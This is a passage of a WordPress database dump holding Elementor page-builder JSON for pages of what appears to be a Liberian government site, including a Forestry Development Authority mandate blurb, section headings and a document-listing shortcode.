,\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c50620c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e54035\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"7bdc1da\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c46227a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9418,1643,'_elementor_controls_usage','a:0:{}'),(9419,1643,'_elementor_edit_mode','builder'),(9420,1643,'_elementor_template_type','wp-post'),(9421,1643,'_elementor_version','2.7.5'),(9422,1643,'_wp_page_template','default'),(9423,1643,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The FDA is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"FDA Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1d082a4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f335f32\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"cb943b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3fed2f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" term=\\\"document_tag:fda\\\" columns=\\\"title,excerpt,cf:download_link,tax:document_category\\\" widths=\\\"350px,900px,auto,auto\\\" links=\\\"terms\\\" filters=\\\"false\\\" rows_per_page=\\\"5\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9424,1644,'_elementor_controls_usage','a:0:{}'),(9425,1644,'_elementor_edit_mode','builder'),(9426,1644,'_elementor_template_type','wp-post'),(9427,1644,'_elementor_version','2.7.5'),(9428,1644,'_wp_page_template','default'),(9429,1644,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The FDA is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1d082a4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f335f32\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cb943b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3fed2f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" term=\\\"document_tag:fda\\\" columns=\\\"title,excerpt,cf:download_link,tax:document_category\\\" widths=\\\"350px,900px,auto,auto\\\" links=\\\"terms\\\" filters=\\\"false\\\" rows_per_page=\\\"5\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9430,1645,'_elementor_controls_usage','a:0:{}'),(9431,1645,'_elementor_edit_mode','builder'),(9432,1645,'_elementor_template_type','wp-post'),(9433,1645,'_elementor_version','2.7.5'),(9434,1645,'_wp_page_template','default'),(9435,1645,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c512178\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Mogcsp<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"MoGCSP Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20a8d07\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e84457\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"532f56d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"57f59e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b007c95\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1a78d5f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"532f56d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f0efc77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a13897\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9436,1646,'_elementor_controls_usage','a:0:{}'),(9437,1646,'_elementor_edit_mode','builder'),(9438,1646,'_elementor_template_type','wp-post'),(9439,1646,'_elementor_version','2.7.5'),(9440,1646,'_wp_page_template','default'),(9441,1646,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c512178\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20a8d07\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in